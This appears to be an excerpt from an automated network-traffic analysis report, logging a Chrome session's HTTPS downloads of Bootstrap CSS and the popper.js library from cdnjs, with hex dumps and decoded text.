                                                                                                2025-01-08 06:22:49 UTC1369INData Raw: 79 2d 64 61 72 6b 3a 23 33 34 33 61 34 30 3b 2d 2d 70 72 69 6d 61 72 79 3a 23 30 30 37 62 66 66 3b 2d 2d 73 65 63 6f 6e 64 61 72 79 3a 23 36 63 37 35 37 64 3b 2d 2d 73 75 63 63 65 73 73 3a 23 32 38 61 37 34 35 3b 2d 2d 69 6e 66 6f 3a 23 31 37 61 32 62 38 3b 2d 2d 77 61 72 6e 69 6e 67 3a 23 66 66 63 31 30 37 3b 2d 2d 64 61 6e 67 65 72 3a 23 64 63 33 35 34 35 3b 2d 2d 6c 69 67 68 74 3a 23 66 38 66 39 66 61 3b 2d 2d 64 61 72 6b 3a 23 33 34 33 61 34 30 3b 2d 2d 62 72 65 61 6b 70 6f 69 6e 74 2d 78 73 3a 30 3b 2d 2d 62 72 65 61 6b 70 6f 69 6e 74 2d 73 6d 3a 35 37 36 70 78 3b 2d 2d 62 72 65 61 6b 70 6f 69 6e 74 2d 6d 64 3a 37 36 38 70 78 3b 2d 2d 62 72 65 61 6b 70 6f 69 6e 74 2d 6c 67 3a 39 39 32 70 78 3b 2d 2d 62 72 65 61 6b 70 6f 69 6e 74 2d 78 6c 3a 31 32 30
                                                                                                Data Ascii: y-dark:#343a40;--primary:#007bff;--secondary:#6c757d;--success:#28a745;--info:#17a2b8;--warning:#ffc107;--danger:#dc3545;--light:#f8f9fa;--dark:#343a40;--breakpoint-xs:0;--breakpoint-sm:576px;--breakpoint-md:768px;--breakpoint-lg:992px;--breakpoint-xl:120
                                                                                                2025-01-08 06:22:49 UTC1369INData Raw: 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 20 64 6f 74 74 65 64 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 20 64 6f 74 74 65 64 3b 63 75 72 73 6f 72 3a 68 65 6c 70 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 30 3b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 2d 73 6b 69 70 2d 69 6e 6b 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 2d 73 6b 69 70 2d 69 6e 6b 3a 6e 6f 6e 65 7d 61 64 64 72 65 73 73 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 69 6e 68 65 72 69 74 7d 64 6c 2c 6f 6c 2c 75 6c 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 72 67 69 6e 2d 62 6f 74
                                                                                                Data Ascii: -decoration:underline dotted;text-decoration:underline dotted;cursor:help;border-bottom:0;-webkit-text-decoration-skip-ink:none;text-decoration-skip-ink:none}address{margin-bottom:1rem;font-style:normal;line-height:inherit}dl,ol,ul{margin-top:0;margin-bot
                                                                                                2025-01-08 06:22:49 UTC1369INData Raw: 6f 20 2d 77 65 62 6b 69 74 2d 66 6f 63 75 73 2d 72 69 6e 67 2d 63 6f 6c 6f 72 7d 62 75 74 74 6f 6e 2c 69 6e 70 75 74 2c 6f 70 74 67 72 6f 75 70 2c 73 65 6c 65 63 74 2c 74 65 78 74 61 72 65 61 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 73 69 7a 65 3a 69 6e 68 65 72 69 74 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 69 6e 68 65 72 69 74 7d 62 75 74 74 6f 6e 2c 69 6e 70 75 74 7b 6f 76 65 72 66 6c 6f 77 3a 76 69 73 69 62 6c 65 7d 62 75 74 74 6f 6e 2c 73 65 6c 65 63 74 7b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6e 6f 6e 65 7d 5b 72 6f 6c 65 3d 62 75 74 74 6f 6e 5d 7b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 73 65 6c 65 63 74 7b 77 6f 72 64 2d 77 72 61 70 3a 6e 6f 72 6d 61 6c 7d 5b 74 79 70 65 3d
                                                                                                Data Ascii: o -webkit-focus-ring-color}button,input,optgroup,select,textarea{margin:0;font-family:inherit;font-size:inherit;line-height:inherit}button,input{overflow:visible}button,select{text-transform:none}[role=button]{cursor:pointer}select{word-wrap:normal}[type=
                                                                                                2025-01-08 06:22:49 UTC1369INData Raw: 32 2c 68 33 2c 68 34 2c 68 35 2c 68 36 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 7d 2e 68 31 2c 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 7d 2e 68 32 2c 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 72 65 6d 7d 2e 68 33 2c 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 35 72 65 6d 7d 2e 68 34 2c 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 7d 2e 68 35 2c 68 35 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 35 72 65 6d 7d 2e 68 36 2c 68 36 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 72 65 6d 7d 2e 6c 65 61 64 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 33 30 30 7d 2e 64 69 73 70 6c 61
                                                                                                Data Ascii: 2,h3,h4,h5,h6{margin-bottom:.5rem;font-weight:500;line-height:1.2}.h1,h1{font-size:2.5rem}.h2,h2{font-size:2rem}.h3,h3{font-size:1.75rem}.h4,h4{font-size:1.5rem}.h5,h5{font-size:1.25rem}.h6,h6{font-size:1rem}.lead{font-size:1.25rem;font-weight:300}.displa
                                                                                                2025-01-08 06:22:49 UTC1369INData Raw: 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 7d 61 3e 63 6f 64 65 7b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 7d 6b 62 64 7b 70 61 64 64 69 6e 67 3a 2e 32 72 65 6d 20 2e 34 72 65 6d 3b 66 6f 6e 74 2d 73 69 7a 65 3a 38 37 2e 35 25 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 31 32 35 32 39 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 2e 32 72 65 6d 7d 6b 62 64 20 6b 62 64 7b 70 61 64 64 69 6e 67 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 70 72 65 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 38 37 2e 35 25 3b 63 6f 6c 6f 72 3a 23 32 31 32 35 32 39 7d 70 72 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a
                                                                                                Data Ascii: ;word-wrap:break-word}a>code{color:inherit}kbd{padding:.2rem .4rem;font-size:87.5%;color:#fff;background-color:#212529;border-radius:.2rem}kbd kbd{padding:0;font-size:100%;font-weight:700}pre{display:block;font-size:87.5%;color:#212529}pre code{font-size:
                                                                                                2025-01-08 06:22:49 UTC1369INData Raw: 6c 2d 6d 64 2d 31 31 2c 2e 63 6f 6c 2d 6d 64 2d 31 32 2c 2e 63 6f 6c 2d 6d 64 2d 32 2c 2e 63 6f 6c 2d 6d 64 2d 33 2c 2e 63 6f 6c 2d 6d 64 2d 34 2c 2e 63 6f 6c 2d 6d 64 2d 35 2c 2e 63 6f 6c 2d 6d 64 2d 36 2c 2e 63 6f 6c 2d 6d 64 2d 37 2c 2e 63 6f 6c 2d 6d 64 2d 38 2c 2e 63 6f 6c 2d 6d 64 2d 39 2c 2e 63 6f 6c 2d 6d 64 2d 61 75 74 6f 2c 2e 63 6f 6c 2d 73 6d 2c 2e 63 6f 6c 2d 73 6d 2d 31 2c 2e 63 6f 6c 2d 73 6d 2d 31 30 2c 2e 63 6f 6c 2d 73 6d 2d 31 31 2c 2e 63 6f 6c 2d 73 6d 2d 31 32 2c 2e 63 6f 6c 2d 73 6d 2d 32 2c 2e 63 6f 6c 2d 73 6d 2d 33 2c 2e 63 6f 6c 2d 73 6d 2d 34 2c 2e 63 6f 6c 2d 73 6d 2d 35 2c 2e 63 6f 6c 2d 73 6d 2d 36 2c 2e 63 6f 6c 2d 73 6d 2d 37 2c 2e 63 6f 6c 2d 73 6d 2d 38 2c 2e 63 6f 6c 2d 73 6d 2d 39 2c 2e 63 6f 6c 2d 73 6d 2d 61 75 74 6f
                                                                                                Data Ascii: l-md-11,.col-md-12,.col-md-2,.col-md-3,.col-md-4,.col-md-5,.col-md-6,.col-md-7,.col-md-8,.col-md-9,.col-md-auto,.col-sm,.col-sm-1,.col-sm-10,.col-sm-11,.col-sm-12,.col-sm-2,.col-sm-3,.col-sm-4,.col-sm-5,.col-sm-6,.col-sm-7,.col-sm-8,.col-sm-9,.col-sm-auto
                                                                                                2025-01-08 06:22:49 UTC1369INData Raw: 3a 30 20 30 20 35 30 25 3b 66 6c 65 78 3a 30 20 30 20 35 30 25 3b 6d 61 78 2d 77 69 64 74 68 3a 35 30 25 7d 2e 63 6f 6c 2d 37 7b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 35 38 2e 33 33 33 33 33 33 25 3b 66 6c 65 78 3a 30 20 30 20 35 38 2e 33 33 33 33 33 33 25 3b 6d 61 78 2d 77 69 64 74 68 3a 35 38 2e 33 33 33 33 33 33 25 7d 2e 63 6f 6c 2d 38 7b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 36 36 2e 36 36 36 36 36 37 25 3b 66 6c 65 78 3a 30 20 30 20 36 36 2e 36 36 36 36 36 37 25 3b 6d 61 78 2d 77 69 64 74 68 3a 36 36 2e 36 36 36 36 36 37 25 7d 2e 63 6f 6c 2d 39 7b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 37 35 25 3b 66 6c 65 78 3a 30 20 30 20 37 35 25 3b 6d 61 78 2d 77 69 64 74 68 3a 37 35 25 7d 2e 63 6f 6c 2d 31 30 7b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 38 33 2e
                                                                                                Data Ascii: :0 0 50%;flex:0 0 50%;max-width:50%}.col-7{-ms-flex:0 0 58.333333%;flex:0 0 58.333333%;max-width:58.333333%}.col-8{-ms-flex:0 0 66.666667%;flex:0 0 66.666667%;max-width:66.666667%}.col-9{-ms-flex:0 0 75%;flex:0 0 75%;max-width:75%}.col-10{-ms-flex:0 0 83.
                                                                                                2025-01-08 06:22:49 UTC1369INData Raw: 62 61 73 69 73 3a 30 3b 2d 6d 73 2d 66 6c 65 78 2d 70 6f 73 69 74 69 76 65 3a 31 3b 66 6c 65 78 2d 67 72 6f 77 3a 31 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 7d 2e 72 6f 77 2d 63 6f 6c 73 2d 73 6d 2d 31 3e 2a 7b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 31 30 30 25 3b 66 6c 65 78 3a 30 20 30 20 31 30 30 25 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 7d 2e 72 6f 77 2d 63 6f 6c 73 2d 73 6d 2d 32 3e 2a 7b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 35 30 25 3b 66 6c 65 78 3a 30 20 30 20 35 30 25 3b 6d 61 78 2d 77 69 64 74 68 3a 35 30 25 7d 2e 72 6f 77 2d 63 6f 6c 73 2d 73 6d 2d 33 3e 2a 7b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 33 33 2e 33 33 33 33 33 33 25 3b 66 6c 65 78 3a 30 20 30 20 33 33 2e 33 33 33 33 33 33 25 3b 6d 61 78 2d 77 69 64 74 68 3a 33 33 2e 33
                                                                                                Data Ascii: basis:0;-ms-flex-positive:1;flex-grow:1;max-width:100%}.row-cols-sm-1>*{-ms-flex:0 0 100%;flex:0 0 100%;max-width:100%}.row-cols-sm-2>*{-ms-flex:0 0 50%;flex:0 0 50%;max-width:50%}.row-cols-sm-3>*{-ms-flex:0 0 33.333333%;flex:0 0 33.333333%;max-width:33.3
                                                                                                2025-01-08 06:22:49 UTC1369INData Raw: 73 74 7b 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 2d 31 3b 6f 72 64 65 72 3a 2d 31 7d 2e 6f 72 64 65 72 2d 73 6d 2d 6c 61 73 74 7b 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 31 33 3b 6f 72 64 65 72 3a 31 33 7d 2e 6f 72 64 65 72 2d 73 6d 2d 30 7b 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 30 3b 6f 72 64 65 72 3a 30 7d 2e 6f 72 64 65 72 2d 73 6d 2d 31 7b 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 31 3b 6f 72 64 65 72 3a 31 7d 2e 6f 72 64 65 72 2d 73 6d 2d 32 7b 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 32 3b 6f 72 64 65 72 3a 32 7d 2e 6f 72 64 65 72 2d 73 6d 2d 33 7b 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 33 3b 6f 72 64 65 72 3a 33 7d 2e 6f 72 64 65 72 2d 73 6d 2d 34 7b 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 34 3b 6f 72 64 65 72 3a
                                                                                                Data Ascii: st{-ms-flex-order:-1;order:-1}.order-sm-last{-ms-flex-order:13;order:13}.order-sm-0{-ms-flex-order:0;order:0}.order-sm-1{-ms-flex-order:1;order:1}.order-sm-2{-ms-flex-order:2;order:2}.order-sm-3{-ms-flex-order:3;order:3}.order-sm-4{-ms-flex-order:4;order:


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                2192.168.2.449757104.17.25.144434548C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-08 06:22:49 UTC616OUTGET /ajax/libs/popper.js/1.16.0/umd/popper.min.js HTTP/1.1
                                                                                                Host: cdnjs.cloudflare.com
                                                                                                Connection: keep-alive
                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                sec-ch-ua-mobile: ?0
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                Accept: */*
                                                                                                Sec-Fetch-Site: cross-site
                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                Sec-Fetch-Dest: script
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                2025-01-08 06:22:49 UTC961INHTTP/1.1 200 OK
                                                                                                Date: Wed, 08 Jan 2025 06:22:49 GMT
                                                                                                Content-Type: application/javascript; charset=utf-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Access-Control-Allow-Origin: *
                                                                                                Cache-Control: public, max-age=30672000
                                                                                                ETag: W/"5eb03fa9-5309"
                                                                                                Last-Modified: Mon, 04 May 2020 16:15:37 GMT
                                                                                                cf-cdnjs-via: cfworker/kv
                                                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                                                Timing-Allow-Origin: *
                                                                                                X-Content-Type-Options: nosniff
                                                                                                CF-Cache-Status: HIT
                                                                                                Age: 1172495
                                                                                                Expires: Mon, 29 Dec 2025 06:22:49 GMT
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m1o1QKLimzlbS2%2FpGi%2BpPkILazSsQLoxsGHULzzzWylFHAKVpUl9waDzVmf8G7ZlTIcvj5iWYC3E9WshaPmg1rBPAHbhpK8qzzAxJ5H8ifsjissXR00BdnoL%2BLkjcM7m%2BooBBWKO"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                Strict-Transport-Security: max-age=15780000
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8fea1869fdd87d02-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2025-01-08 06:22:49 UTC408INData Raw: 35 33 30 39 0d 0a 2f 2a 0a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 46 65 64 65 72 69 63 6f 20 5a 69 76 6f 6c 6f 20 32 30 31 39 0a 20 44 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 4c 69 63 65 6e 73 65 20 28 6c 69 63 65 6e 73 65 20 74 65 72 6d 73 20 61 72 65 20 61 74 20 68 74 74 70 3a 2f 2f 6f 70 65 6e 73 6f 75 72 63 65 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 73 2f 4d 49 54 29 2e 0a 20 2a 2f 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 27 6f 62 6a 65 63 74 27 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 27 75 6e 64 65 66 69 6e 65 64 27 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 27 66 75 6e 63 74 69 6f 6e 27 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26
                                                                                                Data Ascii: 5309/* Copyright (C) Federico Zivolo 2019 Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT). */(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&
                                                                                                2025-01-08 06:22:49 UTC1369INData Raw: 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 29 72 65 74 75 72 6e 5b 5d 3b 76 61 72 20 6f 3d 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2e 64 65 66 61 75 6c 74 56 69 65 77 2c 6e 3d 6f 2e 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 28 65 2c 6e 75 6c 6c 29 3b 72 65 74 75 72 6e 20 74 3f 6e 5b 74 5d 3a 6e 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 65 29 7b 72 65 74 75 72 6e 27 48 54 4d 4c 27 3d 3d 3d 65 2e 6e 6f 64 65 4e 61 6d 65 3f 65 3a 65 2e 70 61 72 65 6e 74 4e 6f 64 65 7c 7c 65 2e 68 6f 73 74 7d 66 75 6e 63 74 69 6f 6e 20 6e 28 65 29 7b 69 66 28 21 65 29 72 65 74 75 72 6e 20 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 3b 73 77 69 74 63 68 28 65 2e 6e 6f 64 65 4e 61 6d 65 29 7b 63 61 73 65 27 48 54 4d 4c 27 3a 63 61 73 65 27 42 4f 44 59 27 3a 72 65 74 75 72 6e 20 65 2e
                                                                                                Data Ascii: ==e.nodeType)return[];var o=e.ownerDocument.defaultView,n=o.getComputedStyle(e,null);return t?n[t]:n}function o(e){return'HTML'===e.nodeName?e:e.parentNode||e.host}function n(e){if(!e)return document.body;switch(e.nodeName){case'HTML':case'BODY':return e.
                                                                                                2025-01-08 06:22:49 UTC1369INData Raw: 2e 68 6f 73 74 2c 74 29 3a 61 28 65 2c 64 28 74 29 2e 68 6f 73 74 29 7d 66 75 6e 63 74 69 6f 6e 20 6c 28 65 29 7b 76 61 72 20 74 3d 31 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3a 27 74 6f 70 27 2c 6f 3d 27 74 6f 70 27 3d 3d 3d 74 3f 27 73 63 72 6f 6c 6c 54 6f 70 27 3a 27 73 63 72 6f 6c 6c 4c 65 66 74 27 2c 6e 3d 65 2e 6e 6f 64 65 4e 61 6d 65 3b 69 66 28 27 42 4f 44 59 27 3d 3d 3d 6e 7c 7c 27 48 54 4d 4c 27 3d 3d 3d 6e 29 7b 76 61 72 20 69 3d 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2c 72 3d 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2e 73 63 72 6f 6c 6c 69 6e 67 45 6c 65 6d 65 6e 74 7c
                                                                                                Data Ascii: .host,t):a(e,d(t).host)}function l(e){var t=1<arguments.length&&void 0!==arguments[1]?arguments[1]:'top',o='top'===t?'scrollTop':'scrollLeft',n=e.nodeName;if('BODY'===n||'HTML'===n){var i=e.ownerDocument.documentElement,r=e.ownerDocument.scrollingElement|
                                                                                                2025-01-08 06:22:49 UTC1369INData Raw: 57 69 64 74 68 7c 7c 70 2e 77 69 64 74 68 2c 61 3d 73 2e 68 65 69 67 68 74 7c 7c 65 2e 63 6c 69 65 6e 74 48 65 69 67 68 74 7c 7c 70 2e 68 65 69 67 68 74 2c 66 3d 65 2e 6f 66 66 73 65 74 57 69 64 74 68 2d 64 2c 68 3d 65 2e 6f 66 66 73 65 74 48 65 69 67 68 74 2d 61 3b 69 66 28 66 7c 7c 68 29 7b 76 61 72 20 75 3d 74 28 65 29 3b 66 2d 3d 6d 28 75 2c 27 78 27 29 2c 68 2d 3d 6d 28 75 2c 27 79 27 29 2c 70 2e 77 69 64 74 68 2d 3d 66 2c 70 2e 68 65 69 67 68 74 2d 3d 68 7d 72 65 74 75 72 6e 20 67 28 70 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 2c 6f 29 7b 76 61 72 20 69 3d 32 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 32 5d 26 26 61 72 67 75 6d 65 6e 74 73 5b 32 5d 2c 70 3d 72 28 31 30 29 2c 73
                                                                                                Data Ascii: Width||p.width,a=s.height||e.clientHeight||p.height,f=e.offsetWidth-d,h=e.offsetHeight-a;if(f||h){var u=t(e);f-=m(u,'x'),h-=m(u,'y'),p.width-=f,p.height-=h}return g(p)}function b(e,o){var i=2<arguments.length&&void 0!==arguments[2]&&arguments[2],p=r(10),s
                                                                                                2025-01-08 06:22:49 UTC1369INData Raw: 65 6e 74 45 6c 65 6d 65 6e 74 7d 66 75 6e 63 74 69 6f 6e 20 76 28 65 2c 74 2c 72 2c 70 29 7b 76 61 72 20 73 3d 34 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 34 5d 26 26 61 72 67 75 6d 65 6e 74 73 5b 34 5d 2c 64 3d 7b 74 6f 70 3a 30 2c 6c 65 66 74 3a 30 7d 2c 6c 3d 73 3f 45 28 65 29 3a 61 28 65 2c 69 28 74 29 29 3b 69 66 28 27 76 69 65 77 70 6f 72 74 27 3d 3d 3d 70 29 64 3d 77 28 6c 2c 73 29 3b 65 6c 73 65 7b 76 61 72 20 66 3b 27 73 63 72 6f 6c 6c 50 61 72 65 6e 74 27 3d 3d 3d 70 3f 28 66 3d 6e 28 6f 28 74 29 29 2c 27 42 4f 44 59 27 3d 3d 3d 66 2e 6e 6f 64 65 4e 61 6d 65 26 26 28 66 3d 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 29 29 3a
                                                                                                Data Ascii: entElement}function v(e,t,r,p){var s=4<arguments.length&&void 0!==arguments[4]&&arguments[4],d={top:0,left:0},l=s?E(e):a(e,i(t));if('viewport'===p)d=w(l,s);else{var f;'scrollParent'===p?(f=n(o(t)),'BODY'===f.nodeName&&(f=e.ownerDocument.documentElement)):
                                                                                                2025-01-08 06:22:49 UTC1369INData Raw: 74 2c 69 28 6f 29 29 3b 72 65 74 75 72 6e 20 62 28 6f 2c 72 2c 6e 29 7d 66 75 6e 63 74 69 6f 6e 20 53 28 65 29 7b 76 61 72 20 74 3d 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2e 64 65 66 61 75 6c 74 56 69 65 77 2c 6f 3d 74 2e 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 28 65 29 2c 6e 3d 70 61 72 73 65 46 6c 6f 61 74 28 6f 2e 6d 61 72 67 69 6e 54 6f 70 7c 7c 30 29 2b 70 61 72 73 65 46 6c 6f 61 74 28 6f 2e 6d 61 72 67 69 6e 42 6f 74 74 6f 6d 7c 7c 30 29 2c 69 3d 70 61 72 73 65 46 6c 6f 61 74 28 6f 2e 6d 61 72 67 69 6e 4c 65 66 74 7c 7c 30 29 2b 70 61 72 73 65 46 6c 6f 61 74 28 6f 2e 6d 61 72 67 69 6e 52 69 67 68 74 7c 7c 30 29 2c 72 3d 7b 77 69 64 74 68 3a 65 2e 6f 66 66 73 65 74 57 69 64 74 68 2b 69 2c 68 65 69 67 68 74 3a 65 2e 6f 66 66 73 65 74 48
                                                                                                Data Ascii: t,i(o));return b(o,r,n)}function S(e){var t=e.ownerDocument.defaultView,o=t.getComputedStyle(e),n=parseFloat(o.marginTop||0)+parseFloat(o.marginBottom||0),i=parseFloat(o.marginLeft||0)+parseFloat(o.marginRight||0),r={width:e.offsetWidth+i,height:e.offsetH
                                                                                                2025-01-08 06:22:49 UTC1369INData Raw: 2e 70 6f 70 70 65 72 2c 74 68 69 73 2e 72 65 66 65 72 65 6e 63 65 2c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 70 6f 73 69 74 69 6f 6e 46 69 78 65 64 29 2c 65 2e 70 6c 61 63 65 6d 65 6e 74 3d 4f 28 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 70 6c 61 63 65 6d 65 6e 74 2c 65 2e 6f 66 66 73 65 74 73 2e 72 65 66 65 72 65 6e 63 65 2c 74 68 69 73 2e 70 6f 70 70 65 72 2c 74 68 69 73 2e 72 65 66 65 72 65 6e 63 65 2c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 6d 6f 64 69 66 69 65 72 73 2e 66 6c 69 70 2e 62 6f 75 6e 64 61 72 69 65 73 45 6c 65 6d 65 6e 74 2c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 6d 6f 64 69 66 69 65 72 73 2e 66 6c 69 70 2e 70 61 64 64 69 6e 67 29 2c 65 2e 6f 72 69 67 69 6e 61 6c 50 6c 61 63 65 6d 65 6e 74 3d 65 2e 70 6c 61 63 65 6d 65 6e 74 2c 65 2e 70 6f 73
                                                                                                Data Ascii: .popper,this.reference,this.options.positionFixed),e.placement=O(this.options.placement,e.offsets.reference,this.popper,this.reference,this.options.modifiers.flip.boundariesElement,this.options.modifiers.flip.padding),e.originalPlacement=e.placement,e.pos
                                                                                                2025-01-08 06:22:49 UTC1369INData Raw: 27 42 4f 44 59 27 3d 3d 3d 65 2e 6e 6f 64 65 4e 61 6d 65 2c 70 3d 72 3f 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2e 64 65 66 61 75 6c 74 56 69 65 77 3a 65 3b 70 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 74 2c 6f 2c 7b 70 61 73 73 69 76 65 3a 21 30 7d 29 2c 72 7c 7c 4d 28 6e 28 70 2e 70 61 72 65 6e 74 4e 6f 64 65 29 2c 74 2c 6f 2c 69 29 2c 69 2e 70 75 73 68 28 70 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 2c 74 2c 6f 2c 69 29 7b 6f 2e 75 70 64 61 74 65 42 6f 75 6e 64 3d 69 2c 41 28 65 29 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 72 65 73 69 7a 65 27 2c 6f 2e 75 70 64 61 74 65 42 6f 75 6e 64 2c 7b 70 61 73 73 69 76 65 3a 21 30 7d 29 3b 76 61 72 20 72 3d 6e 28 65 29 3b 72 65 74 75 72 6e 20 4d 28 72 2c 27 73 63 72 6f 6c 6c 27 2c
                                                                                                Data Ascii: 'BODY'===e.nodeName,p=r?e.ownerDocument.defaultView:e;p.addEventListener(t,o,{passive:!0}),r||M(n(p.parentNode),t,o,i),i.push(p)}function F(e,t,o,i){o.updateBound=i,A(e).addEventListener('resize',o.updateBound,{passive:!0});var r=n(e);return M(r,'scroll',
